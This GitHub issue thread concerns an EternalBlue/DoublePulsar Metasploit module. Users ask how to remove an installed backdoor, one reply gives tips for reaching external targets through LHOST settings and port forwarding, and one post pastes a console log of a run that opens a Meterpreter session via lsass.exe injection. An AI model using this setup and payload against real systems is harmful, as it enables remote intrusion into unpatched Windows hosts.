Open zeldp opened 6 years ago
I'm having the same issue... how do you resolve this?
I'm also having the same issue.
So.... how to fix it?
Is this problem resolved?
Reboot the target host. Since it resides in memory, just rebooting the machine should be enough to clear out your previous backdoor.
You all should know that this Ruby script cannot exploit an external target using its LAN IP, because the payload on the target will connect to the IP configured in your LHOST, which is the LAN IP. You should use a modem to run this plugin; this way you will get an ISP DHCP release which is not in the range of LAN IPs, basically a direct external IP 212.xxx.xxx.xxx instead of 192.168.xxx.xxx. Alternatively, a port forward should be set up on your router to forward all WAN packets to your Linux LAN IP.
And try not to use the bind_tcp payload.
Hi,
Can anyone please let me know how I can remove the backdoor that has been installed? I used the EternalBlue DoublePulsar exploit and payload windows/x64/meterpreter/bind_tcp.
Process inject - lsass.exe
Target Architecture - x64
DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/
ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/
[] Started bind handler
[] x.x.x.x:445 - Generating Eternalblue XML data
[] x.x.x.x:445 - Generating Doublepulsar XML data
[] x.x.x.x:445 - Generating payload DLL for Doublepulsar
[] x.x.x.x:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[] x.x.x.x:445 - Launching Eternalblue...
000f:err:service:process_send_command receiving command result timed out
[+] x.x.x.x:445 - Backdoor is already installed
[] x.x.x.x:445 - Launching Doublepulsar...
000f:err:service:process_send_command receiving command result timed out
[] Sending stage (206403 bytes) to 10.136.8.13
[*] Meterpreter session 2 opened (x.x.x.x:44911 -> x.x.x.x.13:4444) at 2018-07-13 12:35:02 -0400
0015:err:service:process_send_command receiving command result timed out
002b:err:plugplay:handle_bus_relations Failed to load driver L"WineHID"
[+] x.x.x.x:445 - Remote code executed... 3... 2... 1...
Thank you.